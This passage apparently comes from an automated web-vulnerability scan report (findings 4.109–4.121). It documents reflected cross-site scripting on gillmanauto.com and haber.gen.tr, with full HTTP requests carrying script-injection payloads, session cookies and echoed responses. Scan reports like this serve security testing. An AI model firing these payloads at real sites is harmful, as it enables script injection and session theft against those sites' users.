Cookie: ssoid=63e942630a0a0043011b315cea80c7c3; JSESSIONID=h1refb1rpn7nt; lbpoolmember=1728122378.40475.0000; ddcpoolid=CmsPoolA; __utmz=1.1303051319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/41; __utma=1.1275321047.1303051319.1303051319.1303051319.1; __utmc=1; __utmb=1.2.10.1303051319

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:42:43 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13660

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms26.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
</script>1fec5e9f872&amp;20=www.gillmanauto.com&amp;21=/smartbrowse3025a</noscript><script>alert(1)</script>81d6fe8ab38/ajax/used.htm&amp;50=63e942630a0a0043011b315cea80c7c3&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62
...[SNIP]...

4.109. http://www.gillmanauto.com/smartbrowse/ajax/used.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload aaedb</noscript><script>alert(1)</script>2cfa6db0fd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajaxaaedb</noscript><script>alert(1)</script>2cfa6db0fd6/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=true&showBodyStyle=true&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.gillmanauto.com
Proxy-Connection: keep-alive
Referer: http://www.gillmanauto.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63e942630a0a0043011b315cea80c7c3; JSESSIONID=h1refb1rpn7nt; lbpoolmember=1728122378.40475.0000; ddcpoolid=CmsPoolA; __utmz=1.1303051319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/41; __utma=1.1275321047.1303051319.1303051319.1303051319.1; __utmc=1; __utmb=1.2.10.1303051319

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:42:44 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13660

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms26.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
</script>1fec5e9f872&amp;20=www.gillmanauto.com&amp;21=/smartbrowse/ajaxaaedb</noscript><script>alert(1)</script>2cfa6db0fd6/used.htm&amp;50=63e942630a0a0043011b315cea80c7c3&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10
...[SNIP]...

4.110. http://www.haber.gen.tr/edit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /edit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7fd"><script>alert(1)</script>0550415377b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /editac7fd"><script>alert(1)</script>0550415377b HTTP/1.1
Host: www.haber.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 13:52:27 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=f13320fbf75a3c23016d2ee5bddaf39d; path=/; domain=.haber.gen.tr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 63739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/editac7fd"><script>alert(1)</script>0550415377b" type="hidden" />
...[SNIP]...

4.111. http://www.haber.gen.tr/images/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 255cd"><script>alert(1)</script>7d1b8b1193c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images255cd"><script>alert(1)</script>7d1b8b1193c/favicon.ico HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; __utmb=54855858; __utmc=54855858; __utma=54855858.1891209206.1303050928.1303050928.1303050928.1; __utmz=54855858.1303050964.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/40|utmcmd=referral; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:58 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/images255cd"><script>alert(1)</script>7d1b8b1193c/favicon.ico" type="hidden" />
...[SNIP]...

4.112. http://www.haber.gen.tr/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f07"><script>alert(1)</script>a5748c90cb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/favicon.icoa8f07"><script>alert(1)</script>a5748c90cb8 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; __utmb=54855858; __utmc=54855858; __utma=54855858.1891209206.1303050928.1303050928.1303050928.1; __utmz=54855858.1303050964.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/40|utmcmd=referral; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/images/favicon.icoa8f07"><script>alert(1)</script>a5748c90cb8" type="hidden" />
...[SNIP]...

4.113. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ab3"><script>alert(1)</script>471d70f85ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openxb7ab3"><script>alert(1)</script>471d70f85ea/www/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:57 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openxb7ab3"><script>alert(1)</script>471d70f85ea/www/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type
...[SNIP]...

4.114. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd78"><script>alert(1)</script>5b16b6a2009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www5dd78"><script>alert(1)</script>5b16b6a2009/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:02 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www5dd78"><script>alert(1)</script>5b16b6a2009/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hi
...[SNIP]...

4.115. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee416"><script>alert(1)</script>a1aafb63781 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/deliveryee416"><script>alert(1)</script>a1aafb63781/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:12 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/deliveryee416"><script>alert(1)</script>a1aafb63781/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hidden" />
...[SNIP]...

4.116. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d3b"><script>alert(1)</script>df421e28eab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery/ajs.php94d3b"><script>alert(1)</script>df421e28eab?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:16 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery/ajs.php94d3b"><script>alert(1)</script>df421e28eab?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40" type="hidden" />
...[SNIP]...

4.117. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51e2"><script>alert(1)</script>c2c4fe2a9a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openxf51e2"><script>alert(1)</script>c2c4fe2a9a2/www/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:29 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openxf51e2"><script>alert(1)</script>c2c4fe2a9a2/www/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2
...[SNIP]...

4.118. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28677"><script>alert(1)</script>d4080b8fe97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www28677"><script>alert(1)</script>d4080b8fe97/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:33 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www28677"><script>alert(1)</script>d4080b8fe97/delivery/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2F
...[SNIP]...

4.119. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cdf2"><script>alert(1)</script>cdc8a4f2b76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery3cdf2"><script>alert(1)</script>cdc8a4f2b76/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:42 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery3cdf2"><script>alert(1)</script>cdc8a4f2b76/lg.php?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fsh
...[SNIP]...

4.120. http://www.haber.gen.tr/openx/www/delivery/lg.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/lg.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e317"><script>alert(1)</script>d1da29fd1e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openx/www/delivery/lg.php5e317"><script>alert(1)</script>d1da29fd1e0?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40&cb=592dc5eebc HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:48 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 64211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/openx/www/delivery/lg.php5e317"><script>alert(1)</script>d1da29fd1e0?bannerid=305&campaignid=1&zoneid=3&loc=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C%2Fscript%253E0550415377b&referer=http%3A%2F%2Fburp%2Fshow%2F40
...[SNIP]...

4.121. http://www.haber.gen.tr/src/languages/tr/messages.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/languages/tr/messages.js

Issue detail

